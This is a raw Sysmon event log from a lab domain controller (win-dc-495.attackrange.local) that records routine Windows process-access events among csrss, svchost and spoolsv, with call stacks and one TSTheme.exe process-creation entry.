13:58:17.289{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E56-6005-2800-00000000A301}26964316C:\Windows\System32\spoolsv.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1b0d3|C:\Windows\System32\spoolsv.exe+1af39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bfb|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.300{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000010088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 